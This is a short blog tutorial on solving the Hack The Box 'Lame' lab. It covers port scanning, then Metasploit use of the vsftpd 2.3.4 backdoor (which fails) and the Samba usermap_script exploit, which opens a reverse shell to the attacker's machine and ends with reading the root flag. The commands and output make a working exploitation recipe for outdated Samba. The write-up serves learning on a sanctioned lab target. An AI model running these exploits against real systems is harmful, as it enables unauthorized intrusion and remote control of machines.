Hack the box - Lame

Mar 15, 2019 10:32 · 643 words · 4 minute read tutorial writeup ctf

Hack the box

Hack the box is a website that hosts vulnerable servers called “box”. It's a very nice playground to learn about cybersecurity and hacking. As I am just beginning learning the field, my first box will be the easiest one.

sample

I am using Parrot OS in a VM via VirtualBox.

Connecting to HTB VPN

We need first to connect to the Hack the box network before being able to access to any boxes. In the hack the box website, go to Access and download the Connection pack. Then simply run

openvpn yourName.ovpn

You can verify your connection by pinging a box.

Nmap

The first thing to do is a port scan using nmap. Let's use zenmap to have a cool GUI, but you can also use the command nmap -T4 -A -v 10.10.10.3 in your shell.

sample

There are multiple ports opened, including ssh, ftp and a samba server.

Anonymous FTP

We remark in the nmap output that there is a ftp server running accepting anonymous connection |_ftp-anon: Anonymous FTP login allowed (FTP code 230)

We connect to it via ftp 10.10.10.3 However, we see rapidly that this leads to nowhere, the directory is empty.

Metasploit

Let's now use Metasploit to find if there are some vulnerabilities in these services.

We start the Metasploit database and run the console.

sudo msfdb start
msfconsole

vsftpd

Running now the search for vsftpd

msf5 > search vsftpd 2.3.4

Matching Modules
================

Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials
exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution
exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution

The exploit exploit/unix/ftp/vsftpd_234_backdoor looks interesting, let's try to use this.

msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 21 yes The target port (TCP)


Exploit target:

Id Name
-- ----
0 Automatic


msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

Humm, does not work 🤷

Well, there is still the samba server. Now we search for 3.0.20

Samba

msf5 > search 3.0.20

Matching Modules
================

Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/admin/http/wp_easycart_privilege_escalation 2015-02-25 normal Yes WordPress WP EasyCart Plugin Privilege Escalation
exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution

The user map script seems neat.

msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 139 yes The target port (TCP)


Exploit target:

Id Name
-- ----
0 Automatic


msf5 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 10.10.14.61:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 3UeV43XcRvmHR6Ce;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "3UeV43XcRvmHR6Ce\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.61:4444 -> 10.10.10.3:41473) at 2019-03-16 07:05:50 -0400

ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
shell
[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
pwd
pwd
/
sh-3.2#

Bingo, we now have access to a shell, we can just find the flags. Spoiler alert, cat these files /home/makis/user.txt and /root/root.txt

Voila, Lame box is now done. Good job!

tweet Share